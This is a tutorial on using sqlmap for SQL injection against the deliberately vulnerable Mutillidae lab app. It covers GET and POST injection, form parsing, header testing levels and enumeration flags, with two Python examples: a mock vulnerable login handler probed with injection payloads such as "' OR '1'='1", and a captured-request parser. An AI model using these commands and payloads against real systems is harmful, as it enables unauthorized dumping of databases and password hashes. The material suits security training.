Up to now I have always injected by hand; starting today I am using the tool sqlmap.

1. First, injecting with the GET method. GET injection is simple, e.g.:

The page to inject is:

http://192.168.0.105/mutillidae/index.php?page=user-info.php

The commands are as follows (the target URL goes inside the quotes):

#use sqlmap to check whether the URL is injectable
#(add --batch to accept sqlmap's default answers instead of being prompted)

sqlmap -u ""

#list all databases

sqlmap -u "" --dbs

#show the current database user

sqlmap -u "" --current-user

#list all tables and their structure

sqlmap -u "" --schema

#dump all the data from a table (here the columns and rows of table accounts in database owasp10)

sqlmap -u "" --columns -T accounts -D owasp10 --dump
2. Injecting with the POST method:

The key point when passing POST data: always specify the submit parameter name and its default value as well.

For example, to inject the following page:

http://192.168.0.119/mutillidae/index.php?page=login.php

The correct form is:

sqlmap -u "" --data="username=admin&password=admin&login-php-submit-button=login" --dbs

#if written as below, the result is "not injectable". The server-side script typically processes the form, and therefore builds the query, only when the submit-button parameter is present, so without it sqlmap's payloads never reach a SQL statement.

sqlmap -u "" --data="username=admin&password=admin" --dbs
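Why the second command comes back "not injectable", as an added example that is not part of the original post: a toy in-memory login handler mimics the common PHP pattern of only running the query inside `if (isset($_POST["login-php-submit-button"]))` (an assumption about the target; Mutillidae's real code is not reproduced), and a simplified boolean-based blind check in the spirit of sqlmap's is run against the password parameter with and without the submit button. The account data is constructed for the example.

```python
# Added example, not part of the original post: a toy model of the
# section-2 pitfall.  The mock login handler mirrors the common PHP
# pattern `if (isset($_POST["login-php-submit-button"])) { ...query... }`
# (an assumption about the target; Mutillidae's real code is not used),
# and a simplified boolean-based check is run with and without the
# submit parameter to show why the second form comes back "not injectable".
import sqlite3
from urllib.parse import parse_qs, urlencode

SUBMIT_PARAM = "login-php-submit-button"


def make_db():
    """In-memory stand-in for the owasp10.accounts table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts(username TEXT, password TEXT)")
    conn.execute("INSERT INTO accounts VALUES ('admin', 'adminpass')")
    return conn


def login_handler(conn, body):
    """Mock of index.php?page=login.php.  Deliberately vulnerable: the
    form values are concatenated into the query.  The query is only
    built when the submit button was sent, like a PHP handler wrapped
    in isset($_POST[...])."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if SUBMIT_PARAM not in form:
        return "<h1>Login</h1>"  # form re-rendered, no SQL executed
    sql = ("SELECT username FROM accounts WHERE username='%s' AND password='%s'"
           % (form.get("username", ""), form.get("password", "")))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "<h1>Login</h1><p>Error</p>"
    if row:
        return "<h1>Login</h1><p>Logged in as %s</p>" % row[0]
    return "<h1>Login</h1><p>Bad password</p>"


def inject(data, param, payload):
    """Return the form data with `payload` appended to `param`, re-encoded."""
    form = {k: v[0] for k, v in parse_qs(data, keep_blank_values=True).items()}
    form[param] = form.get(param, "") + payload
    return urlencode(form)


def boolean_blind_test(conn, data, param):
    """Simplified boolean-based blind check for one parameter: a condition
    that is always TRUE must change the page and one that is always FALSE
    must leave it identical to the baseline.  (sqlmap uses AND-based pairs
    plus several other techniques; an OR pair is enough for a login form.)"""
    baseline = login_handler(conn, data)
    true_page = login_handler(conn, inject(data, param, "' OR '1'='1"))
    false_page = login_handler(conn, inject(data, param, "' OR '1'='2"))
    return false_page == baseline and true_page != baseline


# Constructed request bodies: the correct one from the post and the one
# that omits the submit button.
GOOD_DATA = urlencode({"username": "admin", "password": "admin", SUBMIT_PARAM: "login"})
BAD_DATA = urlencode({"username": "admin", "password": "admin"})


def demo():
    """Test the password parameter with both bodies."""
    conn = make_db()
    return {
        "with_submit": boolean_blind_test(conn, GOOD_DATA, "password"),
        "without_submit": boolean_blind_test(conn, BAD_DATA, "password"),
    }


if __name__ == "__main__":
    for name, injectable in demo().items():
        print("%-15s injectable=%s" % (name, injectable))
```

With the submit parameter the TRUE payload logs in and the FALSE payload returns the baseline "Bad password" page, so the parameter is reported injectable; without it all three requests get the bare form back and nothing can be detected, no matter how high --level or --risk are set.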
3. sqlmap can parse HTML forms automatically (--forms), so the same thing can also be done like this:

sqlmap --forms -u "" --dbs
4. Sometimes the HTTP headers should be tested too; raise --level. Level 1 tests only GET and POST parameters; level 2 adds Cookie values, level 3 adds User-Agent and Referer, and level 5 adds the Host header (each level also adds more payloads, so higher levels are slower and noisier).

sqlmap --forms -u "" --dbs --level 5
5. Some other sqlmap options:

sqlmap -r [HTTP_FILE] : load the whole request (method, URL, headers, body) from a file, e.g. one saved from Burp Suite.

--method: force the HTTP method (GET, POST, PUT, ...).

--data: the POST body to send (parameter=value pairs).

-p: restrict testing to the named parameter(s).

-f: perform an extensive fingerprint of the database (exact version, underlying OS).

-b: retrieve the DBMS banner.

--sql-shell: open an interactive SQL shell after successful exploitation.

--schema: enumerate the database schema.

--comments: also retrieve DBMS comments (table and column comments) during enumeration.

--reg-read: read a Windows registry key value.

--identify-waf: test whether a WAF/IPS sits in front of the application (newer sqlmap releases run this detection by default and no longer accept the switch).

Enumeration (from sqlmap --help):

These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements

  -a, --all           Retrieve everything
  -b, --banner        Retrieve DBMS banner
  --current-user      Retrieve DBMS current user
  --current-db        Retrieve DBMS current database
  --passwords         Enumerate DBMS users password hashes
  --tables            Enumerate DBMS database tables
  --columns           Enumerate DBMS database table columns
  --schema            Enumerate DBMS schema
  --dump              Dump DBMS database table entries
  --dump-all          Dump all DBMS databases tables entries
  -D DB               DBMS database to enumerate
  -T TBL              DBMS database table(s) to enumerate
  -C COL              DBMS database table column(s) to enumerate

#The important arguments available to you are:

-u : the most important parameter: the URL the request is made to. (For a POST request make sure you give the URL the form actually posts to, not the page the form is displayed on.)

--data : when this argument is given, sqlmap performs POST requests automatically. The POST body can be written directly; if you need help, use a tool like ZAP, Burp Suite or Live HTTP Headers to capture the POST data.

--threads=5 : use 5 threads (faster blind extraction, at the cost of more requests per second against the target).

#Some other useful arguments:

--proxy : tunnel all requests through a proxy. The protocol must be included, e.g. --proxy=http://127.0.0.1:8080 (useful for watching sqlmap's traffic in Burp).

--proxy-cred : credentials for the proxy server.

--tor : route traffic through the Tor anonymity network (--tor-port and --tor-type are used when these differ from the default values).
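To tie -r, --data, --cookie, --method and --level together, here is an added example (not from the original post and not sqlmap's own code) that parses a request captured in the format `sqlmap -r` reads, as Burp Suite or ZAP would save it, derives the equivalent command-line options, and lists which parameters sqlmap would consider at each --level according to its documentation. The sample request, host and session cookie are constructed for the example.

```python
# Added example, not from the original post or from sqlmap itself: parse
# a captured HTTP request in the format `sqlmap -r` reads (as saved from
# Burp Suite / ZAP), derive the equivalent -u/--data/--cookie/--method
# options, and list which parameters sqlmap would test at a given --level.
# The request below is constructed for the example; the host and session
# cookie are made up.
from urllib.parse import parse_qsl, urlsplit

SAMPLE_REQUEST = (
    "POST /mutillidae/index.php?page=login.php HTTP/1.1\r\n"
    "Host: 192.168.0.119\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: PHPSESSID=0123456789abcdef; showhints=0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 59\r\n"
    "\r\n"
    "username=admin&password=admin&login-php-submit-button=login"
)


def parse_request(raw, scheme="http"):
    """Split a raw request into method, absolute URL, headers and body.
    A stale Content-Length (common after hand-editing a saved request)
    is rejected instead of silently sending a truncated body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = headers.get("content-length")
    actual = len(body.encode())
    if declared is not None and int(declared) != actual:
        raise ValueError("Content-Length is %s but body is %d bytes" % (declared, actual))
    return {
        "method": method,
        "url": "%s://%s%s" % (scheme, headers["host"], target),
        "headers": headers,
        "body": body,
    }


def sqlmap_args(req):
    """Equivalent command-line form of the request."""
    args = ["sqlmap", "-u", req["url"]]
    if req["body"]:
        args += ["--data", req["body"]]
    if req["method"] not in ("GET", "POST"):
        args += ["--method", req["method"]]
    if "cookie" in req["headers"]:
        args += ["--cookie", req["headers"]["cookie"]]
    return args


def candidate_params(req, level=1):
    """Injection points sqlmap considers at a --level, per its documentation:
    1 = GET/POST parameters, 2 adds Cookie values, 3 adds User-Agent and
    Referer, 5 adds Host."""
    names = [k for k, _ in parse_qsl(urlsplit(req["url"]).query, keep_blank_values=True)]
    names += [k for k, _ in parse_qsl(req["body"], keep_blank_values=True)]
    headers = req["headers"]
    if level >= 2 and "cookie" in headers:
        names += [c.split("=", 1)[0].strip() for c in headers["cookie"].split(";") if c.strip()]
    if level >= 3:
        names += [h for h in ("user-agent", "referer") if h in headers]
    if level >= 5 and "host" in headers:
        names.append("host")
    return names


if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    print(" ".join(sqlmap_args(req)))
    for lvl in (1, 2, 3, 5):
        print("level %d: %s" % (lvl, ", ".join(candidate_params(req, lvl))))
```

The Content-Length check is the part worth keeping: if you change the body of a saved request by hand and forget the header, the server reads a truncated body and every test silently runs against the wrong parameters. Header values such as the session cookie are only tested once --level is raised, which is why a session-bound injection point can be missed at the default level 1.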